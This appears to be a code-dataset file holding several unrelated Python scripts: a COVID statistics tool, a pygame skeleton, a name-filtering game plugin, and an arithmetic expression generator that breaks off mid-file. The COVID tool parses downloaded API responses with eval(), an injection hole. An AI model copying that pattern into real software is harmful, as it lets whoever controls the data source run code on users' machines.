diff --git "a/4825.jsonl" "b/4825.jsonl" new file mode 100644--- /dev/null +++ "b/4825.jsonl" @@ -0,0 +1,589 @@ +{"seq_id":"451526626","text":"# StrNumMap\n# This class maps any string to a number, which can be reverse\n# looked up\n# i.e. \"sam\" -> 1, 1 -> \"sam\"\n# How to use:\n# Insert string into the map using insertStr, which returns\n# the corresponding num\n# Get a number from an inserted string, use insertStr\n# Get a string from a number, use getStr\n# Sam Mansfield\n\nclass StrNumMap:\n\n def __init__(self):\n self.string_dict = {}\n self.num_dict = {}\n self.num = 0\n \n # If the string is not in the map\n # inserts the string into the map and returns the\n # corresponding number\n # If the string is in the map\n # returns the corresponding number\n def insertStr(self, str):\n if str not in self.string_dict:\n self.string_dict[str] = self.num\n self.num_dict[self.num] = str\n self.num += 1\n return self.string_dict[str]\n\n # If the number is in the map\n # returns the corresponding string\n # If the number is not in the map\n # returns the string no mapping\n # NOTE: If the string \"num not in map\", where num corresponds\n # to the number entered is inserted into the map\n # there is no way to tell whether the string was returned\n # because it is not in the map or if that was the string returned\n def getStr(self, num):\n if num not in self.num_dict:\n return str(num) + \" not in map\" \n else:\n return self.num_dict[num]\n","sub_path":"strNumMap.py","file_name":"strNumMap.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"152341037","text":"# Start of the code\r\n\r\n\"\"\"Importing prerequisites \"\"\"\r\nimport requests # Module to open url\r\nfrom bs4 import BeautifulSoup as bs # Module to extract data from the url\r\nfrom time import sleep # To add delay to the code\r\nimport os # To access files in the computer\r\nfrom art import * # To add ascii art to the code\r\nfrom prettytable import PrettyTable # To print table from an dictionary\r\nimport lxml #To read lxml files\r\n\r\ndef Global_info():\r\n\r\n \"\"\"Function to Get global information \"\"\"\r\n\r\n def live_data():\r\n\r\n \"\"\" To get the live data from https://api.covid19api.com/summary \"\"\"\r\n\r\n global c_data\r\n global con_data\r\n\r\n try:\r\n #To Check the internet connection\r\n print('Trying to connect to network...'); sleep(2)\r\n api = 'https://api.covid19api.com/summary'\r\n req = requests.get(api).text\r\n raw_data = bs(req, 'lxml').text\r\n text = open(\"global_data.txt\",\"w\")\r\n text.write(raw_data)\r\n text.close()\r\n c_data = eval(open('global_data.txt').read())\r\n con_data = c_data['Countries']\r\n print('Connection... 
Successful...Proceeding...'); sleep(2)\r\n\r\n except:\r\n #When device is not connected to the internt\r\n print('Network Error...Trying with old data...'); sleep(3)\r\n\r\n try:\r\n #Trying to read data from the backup\r\n c_data = eval(open('global_data.txt').read())\r\n con_data = c_data['Countries']\r\n\r\n except:\r\n # When the data cannot retrived from the backup\r\n print('Cannot retrive the data...Connect to a Network and try again...'); sleep(1)\r\n tprint('\\nTHANK YOU \\n', font='Bold-small'); sleep(3) # Thank you text in ascii art\r\n os.remove('global_data.txt')#Deleting the unusable data\r\n exit()\r\n \r\n def quick_stats():\r\n\r\n \"\"\"Function to Get quick stats from global information \"\"\"\r\n\r\n gbl_val = c_data['Global']\r\n pt = PrettyTable()#Creating a table\r\n pt.field_names = gbl_val.keys()#Adding field names of the table\r\n pt.add_row(gbl_val.values())#Adding the values to the table\r\n print(pt)\r\n \r\n def data_by_code():\r\n\r\n \"\"\"Function to Get the data by entering country code from global information \"\"\"\r\n\r\n usr_code = input('Enter the Country code which you want the details: ').upper()\r\n\r\n try:\r\n for i in range(len(con_data)):\r\n if con_data[i]['CountryCode'] == usr_code:\r\n del con_data[i]['Slug']\r\n del con_data[i]['ID']\r\n del con_data[i]['Premium']\r\n for key, value in con_data[i].items():\r\n pt = PrettyTable()#Creating a table\r\n pt.field_names = con_data[i].keys()#Adding field names of the table\r\n pt.add_row(con_data[i].values())#Adding the values to the table\r\n print(pt)\r\n break\r\n break\r\n\r\n except:\r\n print('Country code does not exist or check the code...Try Again...')\r\n data_by_code()\r\n\r\n def data_by_con():\r\n\r\n \"\"\"Function to Get data by enter an country from global information \"\"\"\r\n\r\n con = input('Enter the Country which you want the details: ').capitalize()\r\n\r\n try:\r\n for i in range(len(con_data)):\r\n if con_data[i]['Country'] == con:\r\n del con_data[i]['Slug']\r\n del con_data[i]['ID']\r\n del con_data[i]['Premium']\r\n for key, value in con_data[i].items():\r\n pt = PrettyTable()#Creating a table\r\n pt.field_names = con_data[i].keys()#Adding field names of the table\r\n pt.add_row(con_data[i].values())#Adding the values to the table\r\n print(pt)\r\n break\r\n break\r\n\r\n except:\r\n print('Country does not exist or check the Spelling...Try Again...')\r\n data_by_con()\r\n \r\n def sub_Category():\r\n\r\n \"\"\"Function to access sub category from global information \"\"\"\r\n\r\n print('\\nSelect sub_Category...\\n')\r\n print('1. Quick Stats')\r\n print('2. Data by country code')\r\n print('3. 
Data by country')\r\n\r\n usr_global_option = int(input('\\nEnter the option: '))\r\n\r\n #Calling the functions according to user entered option\r\n\r\n while True:\r\n #When user selects option 1\r\n if usr_global_option == 1:\r\n quick_stats()\r\n break\r\n #When user selects option 2\r\n if usr_global_option == 2:\r\n data_by_code()\r\n break\r\n #When user selects option 3\r\n if usr_global_option == 3:\r\n data_by_con()\r\n break\r\n\r\n else:\r\n print('Select the correct option...Try Again...')\r\n\r\n #Calling nested functions of Global_Info()\r\n\r\n live_data()\r\n sub_Category() \r\n\r\ndef State_info():\r\n\r\n \"\"\"Function to get State information\"\"\"\r\n\r\n states = {'Andaman and Nicobar Islands': 'an', 'Andhra Pradesh': 'ap',\r\n 'Arunachal Pradesh': 'ar', 'Assam': 'as', 'Bihar': 'br',\r\n 'Chandigarh': 'ch', 'Chhattisgarh': 'ct', 'Dadar and Nagar Haveli': 'dn',\r\n 'Daman and Diu': 'dd', 'Delhi': 'dl', 'Goa': 'ga', 'Gujarat': 'gj', 'Haryana': 'hr',\r\n 'Himachal Pradesh': 'hp', 'Jammu and Kashmir': 'jk', 'Jharkhand': 'jh', 'Karnataka': 'ka',\r\n 'Kerala': 'kl', 'Lakshadweep': 'la', 'Madhya Pradesh': 'mp', 'Maharashtra': 'mh', 'Manipur': 'mn',\r\n 'Meghalaya': 'ml', 'Mizoram': 'mz', 'Nagaland': 'nl', 'Odisha': 'or', 'Puducherry': 'py', 'Punjab': 'pb',\r\n 'Rajasthan': 'rj', 'Sikkim': 'sk', 'Tamil Nadu': 'tn', 'Telangana': 'tg', 'Tripura': 'tr',\r\n 'Uttar Pradesh': 'up', 'Uttarakhand': 'ut', 'West Bengal': 'wb'}\r\n\r\n def live_data():\r\n\r\n \"\"\" To get the live data from https://api.covid19india.org/states_daily.json \"\"\"\r\n\r\n global s_data\r\n global state_data\r\n\r\n try:\r\n #To Check the internet connection\r\n print('Trying to connect to network...'); sleep(2)\r\n api = 'https://api.covid19india.org/states_daily.json'\r\n req = requests.get(api).text\r\n raw_data = bs(req, 'lxml').text\r\n text = open(\"state_data.txt\",\"w\")\r\n text.write(raw_data)\r\n text.close()\r\n s_data = eval(open('state_data.txt').read())\r\n state_data = s_data['states_daily'][-1]\r\n print('Connection... Successful...Proceeding...'); sleep(2)\r\n\r\n except:\r\n #When device is not connected to the internt\r\n print('Network Error...Trying with old data...'); sleep(3)\r\n\r\n try:\r\n #Trying to read data from the backup\r\n s_data = eval(open('state_data.txt').read())\r\n state_data = s_data['states_daily'][-1]\r\n\r\n except:\r\n # When the data cannot retrived from the backup\r\n print('Cannot retrive the data...Connect to a Network and try again...'); sleep(1)\r\n tprint('\\nTHANK YOU \\n', font='Bold-small'); sleep(3) # Thank you text in ascii art\r\n os.remove('state_data.txt')#Deleting the unusable data\r\n exit()\r\n\r\n def data_by_state():\r\n\r\n \"\"\"To get data by entering state from state information\"\"\"\r\n\r\n try:\r\n usr_state = input('Enter the state In India: ').title()\r\n try:\r\n print('\\nThere are {} cases in {}\\n'.format(state_data[usr_state.lower()], usr_state))\r\n except:\r\n state_val = states[usr_state]\r\n print('\\nThere are {} cases in {}\\n'.format(state_data[state_val], usr_state))\r\n\r\n except:\r\n print('State Does Not Exist or check the spelling ...Try Again...')\r\n data_by_state()\r\n\r\n #Calling nested functions of State_Info()\r\n \r\n live_data()\r\n data_by_state()\r\n \r\ndef mainloop():\r\n\r\n \"\"\"Function to control the flow of the code\"\"\"\r\n\r\n # To print the header of the project in ascii\r\n tprint('\\nPROJECT-COVID \\n', font='Bold-small')\r\n\r\n print('1. Global Information')\r\n print('2. 
Indian State Information')\r\n \r\n while True:\r\n usr_option = int(input('Enter the option: '))\r\n\r\n #To check wether the options are entered correctly\r\n if usr_option in (1, 2):\r\n break\r\n else:\r\n print('Select correct option...Try Again...\\n')\r\n \r\n #Calling the functions according to user entered option\r\n\r\n #When user selects option 1\r\n if usr_option == 1:\r\n tprint('GLOBAL INFORMATION \\n', font='small')# GLOBAL INFORMATION text in ascii art\r\n Global_info()\r\n #When user selects option 2\r\n if usr_option == 2:\r\n tprint('STATE INFORMATION \\n', font='small')# STATE INFORMATION text in ascii art\r\n State_info()\r\n \r\n # To ask the user to run the code again\r\n\r\n while True: \r\n loop = input('Do you want to run the program again (y/n)?')\r\n\r\n #When user wants to run the code again\r\n if loop == 'yes' or loop == 'y':\r\n #Calling the mainloop function to run again\r\n mainloop() \r\n\r\n #When user wants Quit the code\r\n elif loop == 'no' or loop == 'n':\r\n # Thank you text in ascii art\r\n tprint('\\nTHANK YOU \\n', font='Bold-small'); sleep(3)\r\n exit()\r\n\r\n#Calling mainloop function \r\nmainloop()\r\n\r\n# End of the code\r\n","sub_path":"Project COVID.py","file_name":"Project COVID.py","file_ext":"py","file_size_in_byte":9888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"268577761","text":"#nested functions\n\n# def outerFunction():\n# print(\"outer function\")\n# def innerFunction():\n# print(\"we are in inner function\")\n# return innerFunction\n#\n# inner=outerFunction()\n\n#inner()\n\n# def function1():\n# print(\"Hello world\")\n# def innerfn(y):\n# print(y*2)\n#\n# return innerfn\n#\n# x=function1()\n# x(5)\n\n#example 3\n# def add(x):\n# print(\"I'm here to add two numbers\")\n# x=x+5\n# print(x)\n# def multiply(y):\n#\n# y*=x\n#\n# print(y)\n# return multiply\n#\n# y=add(5)\n# y(5)\n\n#nested lambda\nxyz=lambda x,y:lambda z:x+y+z\nouter=xyz(3,4)\nprint(outer)\n\nprint(outer(5))\n\ndef outer(x,y):\n def inner(z):\n z=x+y+z\n return z\n return inner\n\nzyx=outer(3,4)\nprint(zyx)\na=zyx(5)\nprint(a)\n","sub_path":"NestedFns.py","file_name":"NestedFns.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"497190668","text":"#Imports\r\nimport pygame\r\nfrom playerclass import Player\r\nimport random\r\nimport settings\r\nimport os\r\n\r\nclass Game:\r\n def __init__(self):\r\n # Initialize game window\r\n pygame.init()\r\n pygame.mixer.init()\r\n self.screen = pygame.display.set_mode((settings.WIDTH, settings.HEIGHT))\r\n pygame.display.set_caption(\"My Game\")\r\n self.clock = pygame.time.Clock()\r\n self.load_data()\r\n self.running = True\r\n\r\n def load_data(self):\r\n game_folder = os.path.dirname(__file__)\r\n img_folder = os.path.join(game_folder, 'img')\r\n self.player_img = pygame.image.load(os.path.join(img_folder, settings.PLAYER_IMG)).convert_alpha()\r\n\r\n def check_bounds(self):\r\n if self.player_ship.rect.centerx > settings.WIDTH:\r\n self.player_ship.rect.centerx = 0\r\n if self.player_ship.rect.centery > settings.HEIGHT:\r\n self.player_ship.rect.centery = 0\r\n if self.player_ship.rect.centerx < 0:\r\n self.player_ship.rect.centerx = settings.WIDTH\r\n if self.player_ship.rect.centery < 0:\r\n self.player_ship.rect.centery = settings.HEIGHT\r\n\r\n def movement(self):\r\n keystate = pygame.key.get_pressed()\r\n if keystate[pygame.K_w]:\r\n 
self.player_ship.moveUp()\r\n if keystate[pygame.K_s]:\r\n self.player_ship.moveDown()\r\n if keystate[pygame.K_d]:\r\n self.player_ship.moveLeft()\r\n if keystate[pygame.K_a]:\r\n self.player_ship.moveRight()\r\n self.check_bounds()\r\n\r\n def new(self):\r\n # Start a New Game\r\n self.all_sprites = pygame.sprite.Group()\r\n self.player_ship = Player(self, 50, settings.HEIGHT / 2)\r\n self.all_sprites.add(self.player_ship)\r\n self.run()\r\n\r\n def run(self):\r\n # Game loop\r\n self.playing = True\r\n while self.playing:\r\n self.clock.tick(settings.FPS)\r\n self.events()\r\n self.update()\r\n self.draw()\r\n\r\n\r\n def update(self):\r\n # Game loop - Update\r\n self.all_sprites.update()\r\n\r\n def events(self):\r\n # Game loop - Events\r\n for event in pygame.event.get():\r\n # Check for closing the window\r\n if event.type == pygame.QUIT:\r\n self.playing = False\r\n self.running = False\r\n self.movement()\r\n\r\n def draw(self):\r\n # Game loop - Draw\r\n self.screen.fill(settings.BLUE)\r\n self.all_sprites.draw(self.screen)\r\n # *after* drawing everything, flip the display\r\n pygame.display.flip()\r\n\r\n def show_start_screen(self):\r\n # Game splash/start screen\r\n pass\r\n\r\n def show_go_screen(self):\r\n # Game over/continue\r\n pass\r\n\r\n\r\n\r\ndef main():\r\n g = Game()\r\n g.show_start_screen()\r\n while g.running:\r\n g.new()\r\n g.show_go_screen()\r\n\r\nmain()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"131400317","text":"# coding=utf-8\n__author__ = 'DreTaX'\n__version__ = '1.0'\n\nimport clr\n\nclr.AddReferenceByPartialName(\"Pluton\")\nimport Pluton\nimport re\n\"\"\"\n Class\n\"\"\"\n\n\nclass IllegalName:\n\n def getIllegal(self):\n if not Plugin.IniExists(\"IllegalNames\"):\n IllegalNames = Plugin.CreateIni(\"IllegalNames\")\n IllegalNames.AddSetting(\"IllegalNames\", \"Name1\", \"Suck\")\n IllegalNames.AddSetting(\"IllegalNames\", \"Name2\", \"Fuck\")\n IllegalNames.AddSetting(\"IllegalNames\", \"Name3\", \"SHITSERVER\")\n IllegalNames.Save()\n return Plugin.GetIni(\"IllegalNames\")\n\n def IllegalNameConfig(self):\n if not Plugin.IniExists(\"IllegalNameConfig\"):\n loc = Plugin.CreateIni(\"IllegalNameConfig\")\n loc.Save()\n return Plugin.GetIni(\"IllegalNameConfig\")\n\n def CutName(self, string):\n name = re.sub(r'[^\\x00-\\x7F]+','', string)\n return name\n\n def Replace(self, Old, To, Text):\n return re.sub('(?i)'+re.escape(Old), lambda m: To, Text)\n\n def On_ClientAuth(self, AuthEvent):\n name = AuthEvent.Connection.username\n ini = self.IllegalNameConfig()\n asciie = int(ini.GetSetting(\"options\", \"CheckForNonAscii\"))\n regex = int(ini.GetSetting(\"options\", \"CheckWithRegEx\"))\n illini = self.getIllegal()\n listnames = illini.EnumSection(\"IllegalNames\")\n for checkn in listnames:\n get = illini.GetSetting(\"IllegalNames\", checkn)\n name = self.Replace(get, '', name)\n if regex == 1:\n name = re.sub(' +',' ', name)\n name = re.sub('[\\t]+','', name)\n starts = name.startswith(' ')\n ends = name.endswith(' ')\n if starts is True:\n name.replace(name[0], '')\n if ends is True:\n n = len(name)\n name.replace(name[n-1], '')\n a = re.match('^[a-zA-Z0-9_!+?%éáűőúöüó()<>/\\@#,.\\\\s\\[\\]-]+$', name)\n n = len(name)\n if not a or n <= 1:\n name = re.sub('^[a-zA-Z0-9_!+?%éáűőúöüó()<>/\\@#,.\\\\s\\[\\]-]+$', \"\", name)\n if asciie == 1:\n newname = self.CutName(name)\n name = newname\n 
AuthEvent.Connection.username = str(name)","sub_path":"PlutonPlugins/IllegalName/IllegalName.py","file_name":"IllegalName.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"405552157","text":"from dataclasses import dataclass\nfrom typing import Dict\n\nfrom exporter.terra.exceptions import ExperimentMessageParseException\n\n\n@dataclass\nclass ExperimentMessage:\n    process_id: str\n    process_uuid: str\n    submission_uuid: str\n    experiment_index: int\n    total: int\n    job_id: str\n\n    @staticmethod\n    def from_dict(data: Dict) -> 'ExperimentMessage':\n        try:\n            return ExperimentMessage(data[\"documentId\"],\n                                     data[\"documentUuid\"],\n                                     data[\"envelopeUuid\"],\n                                     data[\"index\"],\n                                     data[\"total\"],\n                                     data[\"exportJobId\"])\n        except (KeyError, TypeError) as e:\n            raise ExperimentMessageParseException(e)\n","sub_path":"exporter/terra/experiment/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"563280218","text":"'''\nCreated on May 16, 2017\n\n@author: savvas@purdue.edu\n'''\n\nfrom collections import OrderedDict\nimport itertools\nimport operator\nimport os\n\nfrom arithmetic_evaluator import eval_expr\n\n# the operators to consider\nOPERATORS = ['+', '-', '*', '/', '**']\nOPERATOR_PRECEDENCE = {'**':3, '*':4, '/':4, '+':5, '-':5}\n\n# added terms\nUNARY_OPERATORS = []\n# UNARY_OPERATORS = ['sqrt', 'factorial']\n\n# the digit to use to represent number\nDIGIT = 1\n\n# max number of instances of the DIGIT to use\nMAX_DIGITS = 10\n\n# Ignore results outside the following limits\nRECORD_FROM = 0\nRECORD_TO = 1000000\n\n\ndef operandCombinations(digits):\n    \"\"\"\n    Returns a list of lists with all allowed combinations of the used DIGITS.\n    \n    e.g. for digits = [1, 2, 3] return\n    [\n        [1, 2, 3], [1, 2, -3], [1, -2, 3], [1, -2, -3], [1, 23], [1, -23], \n        [-1, 2, 3], [-1, 2, -3], [-1, -2, 3], [-1, -2, -3], [-1, 23], [-1, -23],\n        [12, 3], [12, -3], [-12, 3], [-12, -3],\n        [123], [-123]\n    ]\n    \"\"\"\n    # if there are no more digits to use, return an empty list\n    if(len(digits) == 0):\n        return [[]]\n    \n    # if there is only 1 digit left to use, return both the positive and negative value of the \n    # digits as two lists.\n    if(len(digits) == 1):\n        return [[digits[0]], [-digits[0]]]\n\n    result = []\n    \n    # construct all possible lengths of consecutive digit sequences\n    # e.g for digits ['1', '2', '3'] construct '1', '12', '123'\n    for sequenceLength in range(len(digits)):\n        \n        digit = digits[0]\n        for index in range(sequenceLength):\n            # append next digit\n            digit = int(str(digit) + str(digits[index + 1]))\n\n        # recursively construct all combinations for smaller lists\n        sublist = operandCombinations(digits[sequenceLength + 1:])\n        result += [[digit] + s for s in sublist] + [[-digit] + s for s in sublist]\n    \n    return result\n\n\ndef operatorCombinations(operatorList, length):\n    \"\"\"\n    Returns a list of lists with all combinations of operators of the given length.\n    \n    e.g. 
for operatorList = ['+', '-', '*'] and length = 3 return\n [\n ['+', '+', '+'], ['+', '+', '-'], ['+', '+', '*'], \n ['+', '-', '+'], ['+', '-', '-'], ['+', '-', '*'], \n ['+', '*', '+'], ['+', '*', '-'], ['+', '*', '*'], \n ['-', '+', '+'], ['-', '+', '-'], ['-', '+', '*'], \n ['-', '-', '+'], ['-', '-', '-'], ['-', '-', '*'], \n ['-', '*', '+'], ['-', '*', '-'], ['-', '*', '*'], \n ['*', '+', '+'], ['*', '+', '-'], ['*', '+', '*'], \n ['*', '-', '+'], ['*', '-', '-'], ['*', '-', '*'], \n ['*', '*', '+'], ['*', '*', '-'], ['*', '*', '*']\n ]\n \"\"\"\n l = []\n for subset in itertools.product(operatorList, repeat=length):\n l += [list(subset)]\n \n return l\n\n\ndef unaryCombinations(token):\n l = []\n for uop in UNARY_OPERATORS:\n # construct the subexpression\n s = uop + \"(\" + token + \")\"\n \n # confirm subexpression is valid, e.g. factorial(-5) will fail\n succeeded = True\n try:\n eval_expr(s)\n except ValueError:\n succeeded = False\n \n if succeeded:\n l.append(s)\n \n return l\n\n\ndef highestPrecedence(operators):\n precedence = -1\n for op in operators:\n if OPERATOR_PRECEDENCE[op] > precedence:\n precedence = OPERATOR_PRECEDENCE[op]\n return precedence\n\n\ndef expressionCombinations2(operandList, operatorList, opBefore=''):\n # number of operators must be exactly one less than operands, since all operations are binary\n if len(operandList) != len(operatorList) + 1:\n raise ValueError(\"Incorrect length of operator list\")\n \n # Base 1: if no operators, return the remaining operand plus unary operations on that operand\n if len(operatorList) == 0:\n first_subexpression = str(operandList[0])\n l = [first_subexpression] + unaryCombinations(first_subexpression)\n return l, [-1 * len(l)]\n \n # Base 2: if only 1 operator remains, construct and return the resulting 2 operand first_subexpression\n if(len(operatorList) == 1):\n first_subexpression = str(operandList[0]) + operatorList[0] + str(operandList[1])\n \n # add it to the list of subexpressions to return\n l = []\n l.append(first_subexpression)\n \n # add unary operations\n l = l + unaryCombinations(first_subexpression)\n \n return l, [OPERATOR_PRECEDENCE[operatorList[0]] * len(l)]\n \n # general case: construct expressions in two parts both recursively constructed\n expressions = []\n highest_precedence_list = []\n for sequenceLength in range(len(operatorList)):\n \n # recursively construct list of subexpressions that come after the first sub expression\n operands_first = operandList[:sequenceLength + 1]\n operators_first = operatorList[:sequenceLength]\n # highest_precedence_first = highestPrecedence(operators_first)\n first_subexpression_list, highest_precedence_first = expressionCombinations2(operands_first, operators_first)\n connecting_op = operatorList[sequenceLength]\n operands_second = operandList[sequenceLength + 1:]\n operators_second = operatorList[sequenceLength + 1:]\n # highest_precedence_second = highestPrecedence(operators_second)\n second_subexpression_list, highest_precedence_second = expressionCombinations2(operands_second, operators_second, connecting_op)\n \n # combine the two parts\n for se1, he1 in zip(first_subexpression_list, highest_precedence_first):\n for se2, he2 in zip(second_subexpression_list, highest_precedence_second):\n \n l1 = [se1]\n h1_list = [he1]\n if opBefore != '' and OPERATOR_PRECEDENCE[opBefore] < he1:\n l1.append('(' + se1 + ')')\n h1_list.append(-1)\n elif OPERATOR_PRECEDENCE[connecting_op] < he1:\n l1.append('(' + se1 + ')')\n h1_list.append(-1)\n elif opBefore == '-' and he1 
== 5:\n l1.append('(' + se1 + ')')\n h1_list.append(-1)\n \n l2 = [se2]\n h2_list = [he2]\n if OPERATOR_PRECEDENCE[connecting_op] < he2:\n l2.append('(' + se2 + ')')\n h2_list.append(-1)\n elif connecting_op == '-' and he2 == 5:\n l2.append('(' + se2 + ')')\n h2_list.append(-1)\n \n for s1, h1 in zip(l1, h1_list):\n for s2, h2 in zip(l2, h2_list):\n e = s1 + connecting_op + s2\n h = max(h1, h2, OPERATOR_PRECEDENCE[connecting_op])\n if e not in expressions:\n expressions.append(e)\n highest_precedence_list.append(h)\n \n return expressions, highest_precedence_list\n\n \n\"\"\"\nReturns a list of expressions with all combinations of parentheses applied to the given operand and \noperator lists.\n\ne.g. for operands [2, 3, 4, 5, 6] and operators ['*', '-', '*', '+'] return\n\n['\n 2*3-4*5+6', '2*3-4*(5+6)', '2*3-(4*5+6)', '2*3-(4*(5+6))', \n '2*(3-4)*5+6', '2*(3-4)*(5+6)', '2*(3-4*5+6)', '2*(3-4*(5+6))', \n '2*(3-4*5)+6', '(2*3-4)*5+6', '(2*3-4)*(5+6)'\n]\n\n\"\"\"\n\n\ndef expressionCombinations(operandList, operatorList, opBefore=''):\n \n # number of operators must be exactly one less than operands\n if len(operandList) != len(operatorList) + 1:\n raise ValueError(\"Incorrect length of operator list\")\n \n # if no operators, return the remaining operand\n if len(operatorList) == 0:\n x = [str(operandList[0])]\n \n for uop in UNARY_OPERATORS:\n # construct the subexpression\n s = uop + \"(\" + str(operandList[0]) + \")\"\n \n # confirm subexpression is valid, e.g. factorial(-5) will fail\n succeeded = True\n try:\n eval_expr(s)\n except ValueError:\n succeeded = False\n \n if succeeded:\n x.append(s)\n \n return x\n \n # if only 1 operator remains, construct and return the expression\n if(len(operatorList) == 1):\n result = []\n result.append(str(operandList[0]) + operatorList[0] + str(operandList[1]))\n \n for uop in UNARY_OPERATORS:\n sq = uop + \"(\" + str(operandList[0]) + operatorList[0] + str(operandList[1]) + \")\"\n succeeded = True\n try:\n eval_expr(sq)\n except ValueError:\n succeeded = False\n \n if succeeded:\n result.append(sq)\n \n if opBefore != '' and OPERATOR_PRECEDENCE[operatorList[0]] > OPERATOR_PRECEDENCE[opBefore]:\n result.append(\"(\" + str(operandList[0]) + operatorList[0] + str(operandList[1]) + \")\")\n return result \n \n result = []\n \n # construct all possible lengths of expressions\n for sequenceLength in range(len(operatorList)):\n \n largestPrecedence = -1\n \n subexpression = str(operandList[0])\n op = operatorList[0]\n for index in range(sequenceLength):\n subexpression += operatorList[index] + str(operandList[index + 1])\n op = operatorList[index + 1]\n \n if OPERATOR_PRECEDENCE[operatorList[index]] > largestPrecedence:\n largestPrecedence = OPERATOR_PRECEDENCE[operatorList[index]]\n \n sublist = expressionCombinations(operandList[sequenceLength + 1:], operatorList[sequenceLength + 1:], op)\n \n result += [subexpression + op + s for s in sublist]\n \n for uop in UNARY_OPERATORS:\n sq = uop + \"(\" + subexpression + \")\"\n succeeded = True\n try:\n eval_expr(sq)\n except ValueError:\n succeeded = False\n if succeeded:\n result += [sq + op + s for s in sublist]\n \n if (OPERATOR_PRECEDENCE[op] < largestPrecedence or \n (opBefore in OPERATOR_PRECEDENCE and OPERATOR_PRECEDENCE[opBefore] < largestPrecedence)):\n result += [\"(\" + subexpression + \")\" + op + s for s in sublist]\n \n if opBefore != '':\n result += [\"(\" + subexpression + op + s + \")\" for s in sublist]\n \n for uop in UNARY_OPERATORS:\n sq = uop + \"(\" + subexpression + op + s + \")\"\n 
succeeded = True\n try:\n eval_expr(sq)\n except ValueError:\n succeeded = False\n if succeeded:\n result += [sq + op + s for s in sublist]\n \n if opBefore == '-' and ('-' in subexpression + op + s or '+' in subexpression + op + s):\n result += [\"(\" + subexpression + op + s + \")\" for s in sublist]\n \n for uop in UNARY_OPERATORS:\n sq = uop + \"(\" + subexpression + op + s + \")\"\n succeeded = True\n try:\n eval_expr(sq)\n except ValueError:\n succeeded = False\n if succeeded:\n result += [sq + op + s for s in sublist]\n \n return list(OrderedDict.fromkeys(result))\n # return result\n\n\nRESULT = {}\nCOUNT = 0\nNEXT_IN_SERIES = RECORD_FROM\n\n\ndef evalExpressions(expressionList):\n \"\"\"\n Evaluate expressions\n \"\"\"\n global RESULT\n global COUNT\n global NEXT_IN_SERIES\n \n # remove obsolete expressions\n expressionList = filter(lambda a: \"--\" not in a, expressionList)\n # expressionList = filter(lambda a: \"-(-\" not in a, expressionList)\n expressionList = filter(lambda a: \"+-\" not in a, expressionList)\n # expressionList = filter(lambda a: \"+(-\" not in a, expressionList)\n \n for expression in expressionList:\n \n COUNT += 1\n # if COUNT % 100000 == 0:\n # print \"Evaluated \" + str(COUNT) + \" expressions\"\n \n # print expression \n try:\n result = float(eval_expr(expression))\n except Exception:\n continue\n \n # print \"BEFORE= \" + expression + \" = \" + str(result)\n \n if isinstance(result, float):\n if not result.is_integer():\n continue\n \n x = int(result)\n result = x\n \n if result < RECORD_FROM:\n continue\n \n if result > RECORD_TO:\n continue\n \n if result < NEXT_IN_SERIES:\n continue\n \n if result == NEXT_IN_SERIES:\n NEXT_IN_SERIES += 1\n \n if result not in RESULT:\n RESULT[result] = expression\n \n # print \"AFTER= \" + expression + \" = \" + str(result)\n \n # return result\n\n\ndef execute():\n global RESULT\n global NEXT_IN_SERIES\n \n for number_of_digits in range(MAX_DIGITS):\n digits = [DIGIT] * (number_of_digits + 1)\n operandComb = operandCombinations(digits)\n \n print (digits)\n print(len(operandComb))\n for operandListIndex in range(len(operandComb)):\n operandList = operandComb[operandListIndex]\n operatorComb = operatorCombinations(OPERATORS, len(operandList) - 1)\n \n if len(operatorComb) == 0:\n expressionList = expressionCombinations2(operandList, [])[0]\n evalExpressions(expressionList)\n else:\n for operatorListIndex in range(len(operatorComb)):\n operatorList = operatorComb[operatorListIndex]\n expressionList = expressionCombinations2(operandList, operatorList)[0]\n evalExpressions(expressionList)\n \n print (\"Completed: \" + str(operandListIndex) + \" = \" + str(operandList))\n \n if (operandListIndex != 0 and operandListIndex % 10 == 0) or operandListIndex == len(operandComb) - 1:\n\n for i in range(10):\n try:\n with open(str(DIGIT) + \"_INDEX\" + str(operandListIndex - 10 + i) + \".txt\", \"r\") as expressionCombinations:\n for line in expressionCombinations:\n r = line.split()\n if int(r[0]) not in RESULT:\n RESULT[int(r[0])] = r[1]\n \n # remove previous file\n try:\n os.remove(str(DIGIT) + \"_INDEX\" + str(operandListIndex - 10 + i) + \".txt\")\n print (\"deleting \" + str(DIGIT) + \"_INDEX\" + str(operandListIndex - 10 + i) + \".txt\")\n except OSError:\n pass\n \n except Exception:\n pass\n \n if operandListIndex == len(operandComb) - 1:\n sorted_x = sorted(RESULT.items(), key=operator.itemgetter(0))\n next_in = RECORD_FROM\n with open(str(DIGIT) + \"_FINAL\" + str(number_of_digits + 1) + \".txt\", \"w\") as 
